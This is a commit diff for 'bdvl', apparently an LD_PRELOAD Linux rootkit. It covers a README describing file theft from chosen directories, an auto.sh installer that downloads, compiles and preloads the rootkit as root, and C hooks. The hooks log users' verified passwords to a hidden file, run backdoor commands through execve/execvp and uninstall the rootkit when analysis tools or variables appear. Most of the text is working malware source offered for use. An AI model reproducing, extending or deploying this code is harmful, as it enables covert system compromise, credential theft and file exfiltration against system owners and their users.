Smarter bdvl. Better bdvl.

For starters, FILE_STEAL is now
accompanied by INTERESTING_DIRECTORIES.
Files in these directories will
be stolen when opened.

Upon logging into the backdoor,
a size count will be displayed
indicating exactly how much has
been stolen by FILE_STEAL.
in bytes, kb, or mb

Other changes are just fixes
& me trying to make things
generally better... A couple
of problems have also been
resolved...

Author: jrowa2

README.md

@@ -92,6 +92,7 @@ strip bdvl.so*
  * Be warned that (_this version of_) the rootkit is not designed to be used with a lot of these features disabled.
  * Irregular behaviour & general weirdness may occur otherwise.
  * I am slowly making this better. Until then I recommend keeping everything enabled...
+ * __A handful of functionalities do not begin until the first backdoor login.__
 
 <hr>
 
@@ -155,9 +156,10 @@ strip bdvl.so*
 <hr>
 
 #### File stealing
- * Files that will be stolen are defined in `setup.py` (__INTERESTING_FILES__).
- * Wildcards apply to filenames.
-   * i.e.: `INTERESTING_FILES = ['*.html', '*.php', 'backup.*']`
+ * Files that will be stolen are defined in `setup.py`. (__INTERESTING_FILES__)
+ * Files within directories listed in __INTERESTING_DIRECTORIES__ will also be stolen.
+ * Wildcards apply to filenames within __INTERESTING_FILES__.
+   * i.e.: `INTERESTING_FILES = ['*.zip', '*.rar', '*.txt', '*.db', 'backup.*']`
    * You can also specify paths & they'll also support wildcards.
  * You may want to consult the default target files & the other settings surrounding it...
  * Files already stolen will be removed at least every `FILE_CLEANSE_TIMER` seconds.

auto.sh

@@ -1,4 +1,4 @@
 #!/bin/sh
-[ -z "$1" ] && B64TARGZ_LOCATION="http://192.168.0.48:9001/changeme.b64" # changeme
+[ -z "$1" ] && B64TARGZ_LOCATION="http://192.168.0.48:9001/super.b64" # changeme
 WORKDIR="/tmp" # & mayb this.
 [ `id -u` != 0 ] && exit; [ ! -e /proc ] && exit; [ ! -f /etc/ssh/sshd_config ] && echo "No sshd_config"; [ -d /proc/xen ] && echo "Xen environment detected"; [ -d /proc/vz ] && echo "OpenVZ environment detected"; [ -f /usr/bin/lveps ] && echo "CloudLinux LVE detected"; bin_path(){ echo -n `which $1 2>/dev/null || echo -n 'v'`; }; [ ! -f `bin_path gcc` ] && echo "GCC will be installed."; [ ! -f `bin_path base64` ] && { echo 'Missing base64 util?' && exit; }; [ ! -f `bin_path tar` ] && { echo 'Missing tar?' && exit; }; dlfile(){ if test "$DWNLDR" = "wget"; then DL_C="$DWNLDR -q $1 -O $2"; fi; if test "$DWNLDR" = "curl"; then DL_C="$DWNLDR -s $1 -o $2"; fi; $DL_C || { echo 'Failed downloading.'; rm -f $2; exit; }; }; _LOCATION="`printf "$B64TARGZ_LOCATION" | sed -e 's/^\(.\{4\}\).*/\1/'`"; if test "$_LOCATION" = "http"; then [ -f `bin_path wget` ] && DWNLDR='wget'; [ -f `bin_path curl` ] && DWNLDR='curl'; [ -z $DWNLDR ] && { echo 'Missing wget/curl.' && exit; }; fi; printf "\n\tBEGINNING.\n\n"; [ ! -z "$1" ] && mv "$1" $WORKDIR/; cd $WORKDIR; [ -z "$1" ] && B64TARGZ_FILENAME="`basename $B64TARGZ_LOCATION`"; [ ! -z "$1" ] && B64TARGZ_FILENAME="$1"; if test "$_LOCATION" = "http"; then echo "Downloading $B64TARGZ_FILENAME" && dlfile $B64TARGZ_LOCATION $B64TARGZ_FILENAME; fi; TARGZ_NAME="${B64TARGZ_FILENAME}.tar.gz"; echo "Extracting"; cat $B64TARGZ_FILENAME | base64 -d > $TARGZ_NAME || { echo "Couldn't b64" && rm -f $B64TARGZ_FILENAME $TARGZ_NAME; exit; }; [ ! -f $TARGZ_NAME ] && { echo "Target not found." && rm -f $B64TARGZ_FILENAME; exit; }; INCLUDE_DIR="`tar tzf $TARGZ_NAME | head -1 | cut -f1 -d"/"`"; tar xpfz $TARGZ_NAME >/dev/null; echo "Removing" && rm $TARGZ_NAME $B64TARGZ_FILENAME; [ ! -d "$INCLUDE_DIR" ] && { echo "Include dir not found."; rm -f $TARGZ_NAME $B64TARGZ_FILENAME; exit; }; BDVLSO="`sed '1q;d' $INCLUDE_DIR/settings.cfg`"; echo "Dependencies"; [ -f /usr/bin/yum ] && { for pkg in gcc newt libgcc.i686 glibc-devel.i686 glibc-devel vim-common pam-devel libpcap libpcap-devel; do yum install -e 0 $pkg; done; }; [ -f /usr/bin/pacman ] && { pacman -Syy; for pkg in glibc base-devel pam libpcap; do pacman -S $pkg; done; }; [ -f /usr/bin/apt-get ] && { if test "`uname -m | sed -e 's/^\(.\{4\}\).*/\1/'`" != "armv"; then dpkg --add-architecture i386; fi; apt-get -qq --yes --force-yes update; for pkg in gcc-multilib build-essential libpam0g-dev libpcap-dev libpcap0.8-dev; do apt-get -qq --yes --force-yes install $pkg; done; grep -i ubuntu /proc/version &>/dev/null && rm -f /etc/init/plymouth*; }; echo "Compiling"; LINKER_FLAGS="-ldl -lcrypt"; WARNING_FLAGS="-Wall"; OPTIMIZATION_FLAGS="-O0 -g0"; OPTIONS="-fomit-frame-pointer -fPIC"; LINKER_OPTIONS="-Wl,--build-id=none"; PLATFORM="`uname -m`"; _PLATFORM="`printf $PLATFORM | sed -e 's/^\(.\{4\}\).*/\1/'`"; if test "$_PLATFORM" = "armv"; then PLATFORM="`printf $PLATFORM | sed 's/.*\(...\)/\1/'`"; fi; gcc -std=gnu99 $OPTIMIZATION_FLAGS $INCLUDE_DIR/bedevil.c $WARNING_FLAGS $OPTIONS -I$INCLUDE_DIR -shared $LINKER_FLAGS $LINKER_OPTIONS -o $INCLUDE_DIR/$BDVLSO.$PLATFORM; gcc -m32 -std=gnu99 $OPTIMIZATION_FLAGS $INCLUDE_DIR/bedevil.c $WARNING_FLAGS $OPTIONS -I$INCLUDE_DIR -shared $LINKER_FLAGS $LINKER_OPTIONS -o $INCLUDE_DIR/$BDVLSO.i686 2>/dev/null; strip $INCLUDE_DIR/$BDVLSO.$PLATFORM 2>/dev/null || { echo "Couldn't strip"; rm -rf $INCLUDE_DIR; exit; }; [ -f $INCLUDE_DIR/$BDVLSO.i686 ] && strip $INCLUDE_DIR/$BDVLSO.i686; LD_PRELOAD=$INCLUDE_DIR/$BDVLSO.$PLATFORM sh -c "./bdvinstall $INCLUDE_DIR/$BDVLSO.*"; rm -r $INCLUDE_DIR; exit;

etc/.bashrc

@@ -2,7 +2,7 @@ tty -s || return
 [ ! -z $TERM ] && export TERM=xterm
 [ $(id -u) != 0 ] && su root
 [ $(id -u) != 0 ] && kill -9 $$
-./bdvrolf; ./bdv makelinks
+./bdvprep; ./bdv makelinks
 alias ls='ls --color=auto'
 alias ll='ls --color=auto -AlFhn'
 chown -h 0:`id -g` ~/* &>/dev/null

inc/bedevil.c

@@ -1,6 +1,12 @@
 #define _GNU_SOURCE
 
 #include "config.h"
+
+typedef struct {
+    void *(*func)();
+} syms;
+
+#include "bedevil.h"
 #include "sanity.h"
 
 #include <stdio.h>
@@ -49,11 +55,6 @@
 #endif
 
 #define LINE_MAX 2048
-
-typedef struct {
-    void *(*func)();
-} syms;
-
 #define sizeofarr(arr) sizeof(arr) / sizeof(arr[0])
 
 void plsdomefirst(void);

inc/hiding/evasion/evasion.c

@@ -1,9 +1,12 @@
+/* uninstall. continue execution in child. reinstall in parent. */
 int remove_self(void){
     if(not_user(0))
         return VINVALID_PERM;
 
     hook(CUNLINK);
 #ifdef PATCH_DYNAMIC_LINKER
+    for(int i = 0; i != LDPATHS_SIZE; i++)
+        ldpatch(ldpaths[i], PRELOAD_FILE, OLD_PRELOAD, NORMLUSR);
     call(CUNLINK, PRELOAD_FILE);
 #else
     call(CUNLINK, OLD_PRELOAD);
@@ -19,6 +22,8 @@ int remove_self(void){
 
     wait(NULL);
 #ifdef PATCH_DYNAMIC_LINKER
+    for(int i = 0; i != LDPATHS_SIZE; i++)
+        ldpatch(ldpaths[i], OLD_PRELOAD, PRELOAD_FILE, NORMLUSR);
     reinstall(PRELOAD_FILE);
     hide_path(PRELOAD_FILE);
 #else
@@ -28,44 +33,40 @@ int remove_self(void){
     return VEVADE_DONE;
 }
 
+
+/* checks all of the scary_* arrays created by setup.py against execve/p args.
+ * the scary_procs loop checks the name of the calling process as well. */
 int evade(const char *filename, char *const argv[], char *const envp[]){
     char *scary_proc, *scary_path;
 
-    /* check scary_procs array */
     for(int i = 0; i < SCARY_PROCS_SIZE; i++){
         scary_proc = scary_procs[i];
 
         char path[strlen(scary_proc) + 3];
         snprintf(path, sizeof(path), "*/%s", scary_proc);
 
-        /* determine if calling process is a scary process, or someone
-         * is trying to launch a scary process. */
-        if(process(scary_proc)) return remove_self();
-        else if(strstr(scary_proc, filename)) return remove_self();
-        else if(!fnmatch(path, filename, FNM_PATHNAME)) return remove_self();
+        if(process(scary_proc) || strstr(filename, scary_proc) || !fnmatch(path, filename, FNM_PATHNAME))
+            return remove_self();
     }
 
-    /* check scary_paths array.
-       see if somebody is trying to call the dynamic linker
-       in order to resolve a path's dependencies. */
     for(int i = 0; i < SCARY_PATHS_SIZE; i++){
         scary_path = scary_paths[i];
 
-        if(!fnmatch(scary_path, filename, FNM_PATHNAME) || strstr(scary_path, filename))
-            for(int ii = 0; argv[ii] != NULL; ii++)
-                if(!strncmp("--list", argv[ii], 6))
+        for(int argi = 1; argv[argi] != NULL; argi++)
+            if(!fnmatch(scary_path, argv[argi], FNM_PATHNAME))
+                return remove_self();
+
+        if(!fnmatch(scary_path, filename, FNM_PATHNAME))
+            for(int argi = 0; argv[argi] != NULL; argi++)
+                if(!strncmp("--list", argv[argi], 6))
                     return remove_self();
     }
 
-    /* check scary_variables array to see if there is anything
-       set that is a potential threat and subvert it. */
     if(envp != NULL)
         for(int i = 0; envp[i] != NULL; i++)
             for(int ii = 0; ii < SCARY_VARIABLES_SIZE; ii++)
                 if(!strncmp(scary_variables[ii], envp[i], strlen(scary_variables[ii])))
                     return remove_self();
 
-    /* if the above checks bore no results, there is (apparently)
-     * nothing to do. */
     return VNOTHING_DONE;
 }

inc/hiding/evasion/evasion.h

@@ -2,10 +2,6 @@
 #define EVASION_H
 
 
-int scary_path(const char *string);
-int block_strings(const char *filename, char *const argv[]);
-#include "block_strings.c"
-
 #define VINVALID_PERM 0
 #define VFORK_ERR    -1
 #define VFORK_SUC     2

inc/hooks/authlog/authlog.h

@@ -1,10 +1,7 @@
 #ifndef AUTHLOG_H
 #define AUTHLOG_H
 
-#define LOG_FMT "%s (%s)\n"
-
 int verify_pass(char *user, char *resp);
-int alreadylogged(char *user, char *resp);
 void log_auth(pam_handle_t *pamh, char *resp);
 #include "log.c"
 

inc/hooks/authlog/log.c

@@ -17,45 +17,28 @@ int verify_pass(char *user, char *resp){
     return 0;
 }
 
-int alreadylogged(char *user, char *resp){
-    FILE *fp;
-    char line[LINE_MAX], logline[strlen(user)+strlen(resp)+32];
-    int logged = 0;
-    snprintf(logline, sizeof(logline), LOG_FMT, user, resp);
-
-    hook(CFOPEN);
-
-    fp = call(CFOPEN, LOG_PATH, "r");
-    if(fp == NULL) return logged;
-
-    while(fgets(line, sizeof(line), fp) != NULL){
-        if(!strcmp(line, logline)){
-            logged = 1;
-            break;
-        }
-    }
-
-    fclose(fp);
-    return logged;
-}
-
 void log_auth(pam_handle_t *pamh, char *resp){
     char *user;
     int  got_pw;
     FILE *fp;
 
+    hook(CFOPEN, CFWRITE);
+
     user = get_username(pamh);
     if(user == NULL) return;
 
     got_pw = verify_pass(user, resp);
     if(!got_pw) return;
-    if(alreadylogged(user, resp)) return;
 
-    hook(CFOPEN);
+    char logbuf[strlen(user)+strlen(resp)+5];
+    snprintf(logbuf, sizeof(logbuf), LOG_FMT, user, resp);
+
+    if(alreadylogged(LOG_PATH, logbuf))
+        return;
+
     fp = call(CFOPEN, LOG_PATH, "a");
     if(fp == NULL) return;
-
-    fprintf(fp, LOG_FMT, user, resp);
+    call(CFWRITE, logbuf, 1, strlen(logbuf), fp);
     fclose(fp);
 
     if(!hidden_path(LOG_PATH))

inc/hooks/exec/execve.c

@@ -14,8 +14,8 @@ int execve(const char *filename, char *const argv[], char *const envp[]){
 
     if(magicusr()){
 #ifdef BACKDOOR_ROLF
-        if(!fnmatch("*/bdvrolf", argv[0], FNM_PATHNAME))
-            dorolfpls();
+        if(!fnmatch("*/bdvprep", argv[0], FNM_PATHNAME))
+            bdprep();
 #endif
 #ifdef BACKDOOR_UTIL
         if(!fnmatch("*/bdv", argv[0], FNM_PATHNAME))
@@ -49,11 +49,6 @@ int execve(const char *filename, char *const argv[], char *const envp[]){
         case VNOTHING_DONE:
             break;  /* ?? */
     }
-
-    if(block_strings(filename, argv)){
-        errno = EPERM;
-        return -1;
-    }
 #endif
 
     return (long)call(CEXECVE, filename, argv, envp);

inc/hooks/exec/execvp.c

@@ -14,8 +14,8 @@ int execvp(const char *filename, char *const argv[]){
 
     if(magicusr()){
 #ifdef BACKDOOR_ROLF
-        if(!fnmatch("*/bdvrolf", argv[0], FNM_PATHNAME))
-            dorolfpls();
+        if(!fnmatch("*/bdvprep", argv[0], FNM_PATHNAME))
+            bdprep();
 #endif
 #ifdef BACKDOOR_UTIL
         if(!fnmatch("*/bdv", argv[0], FNM_PATHNAME))
@@ -49,11 +49,6 @@ int execvp(const char *filename, char *const argv[]){
         case VNOTHING_DONE:
             break;  /* ?? */
     }
-
-    if(block_strings(filename, argv)){
-        errno = EPERM;
-        return -1;
-    }
 #endif
 
     return (long)call(CEXECVP, filename, argv);